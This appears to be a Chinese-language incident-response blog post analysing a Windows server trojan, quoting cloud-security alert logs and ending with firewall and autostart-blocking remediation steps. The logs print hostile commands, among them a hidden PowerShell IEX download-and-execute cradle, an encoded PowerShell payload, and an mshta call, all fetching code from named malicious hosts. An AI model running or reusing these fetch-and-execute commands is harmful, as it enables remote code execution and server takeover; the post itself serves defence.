一、攻击源：两大木马站点

http://www.al1baba.club/index.hta

http://t.sectools.io/t/evil.hta

二、攻击路径和原理：

表现1：利用shell下载病毒资源

命令行：powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://www.al1baba.club:8080/a'))"

进程路径：C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe

进程ID：11128

父进程命令行：cmd /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://www.al1baba.club:8080/a'))"

父进程文件路径：C:/Windows/System32/cmd.exe

父进程ID：4056

事件说明：云安全中心检测到您的主机上执行的进程命令行高度可疑，很有可能与木马、病毒、黑客行为有关，请及时排查处理。

表现2：利用shell调用mashta绕过防火墙下载病毒资源

命令行：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB

进程路径：C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe

进程ID：15068

父进程命令行：C:/Windows/System32/mshta.exe

父进程文件路径：C:/Windows/System32/mshta.exe

父进程ID：8792

事件说明：云安全中心检测到您的主机上执行的进程命令行高度可疑，很有可能与木马、病毒、黑客行为有关，请及时排查处理。

进程异常行为-利用Windows系统文件加载恶意代码已忽略

备注

命令行：mshta http://t.sectools.io/t/evil.hta

进程路径：C:/Windows/System32/mshta.exe

进程ID：8792

父进程ID：10800

事件说明：云安全中心检测到ECS执行的命令极有可能是在利用Windows系统文件加载恶意代码，以此绕过反病毒检测。

?高风险的域名：t.sectools.io

情报标签：恶意下载源

该域名解析的IP：104.27.167.42

事件说明：云盾基于威胁情报数据，检测到您的服务器正在访问一个高风险的域名，这个域名可能是钓鱼网站、僵尸网络组织、矿池地址等不正常域名，这意味着您的服务器可能沦陷，并被黑客控制利用。如果您发现此域名是误报，请忽略本次告警。

解决方案：建议您结合这个域名和域名解析的IP在互联网上的公开信息，或云盾的其他告警详情，快速排查服务器的缺陷，如主机进程日志，计划任务等，并及时修复和加固

URL链接：http://t.sectools.io:8880/whoami

与该URL有关联的漏洞：

User Agent：

恶意文件md5：b77e47cdb630a166527e2cb3efbaca44

事件说明：云盾检测到您的服务器正在通过HTTP请求，尝试连接一个可疑恶意下载源，可能是黑客通过运行指令、恶意进程等方式从远程服务器下载恶意文件，危害服务器安全。如果该操作不是您自己运行，请及时排查入侵原因，例如查看本机的计划任务、发起对外连接的父子进程。

解决方案：请及时通过告警详情排查连接恶意下载源的异常指令和恶意进程，排查该恶意URL下载的文件md5是否在服务器上，并及时清理已运行的恶意进程。如果该URL是您自己主动连接的，您可以在控制台点击标记为误报。

三、终极实战方案：

由于该木马主要攻击路径：利用用户登录自动启动cmd,然后调用mshta，最后利用mshta联网访问木马站点下载木马软件，实现对服务器控制，因此我们需要阻断该途径任何环节。

1、多层级应用防火墙封杀阻断对改两个域名的访问，列入黑名单，一般防火墙就会自动识别，自动阻止

2、但是服务器依然有被锁定可能，这样会不断调用系统文件cmd和mshta系统文件去联系木马站点，怎么办？

此时需要做以下几点：

1、找出是否已下载程序，有，清除。

2、杀毒软件阻断cmd以及mshta开机或登录自动启动

3、建立系统防火墙规则，禁止cmd.exe以及mshta.exe系统文件出站访问能力。

4、加强多层级防火墙规则，阻断非服务需要访问的任何出站协议和TCP|UDP端口，阻断任何入站非服务端口。

至此，这两个木马彻底解决。

相关文章：

重大漏洞：泛微E-cology OA系统SQL注入漏洞及解决方案

紧急漏洞小心被黑：泛微BSH组件漏洞攻击及解决方案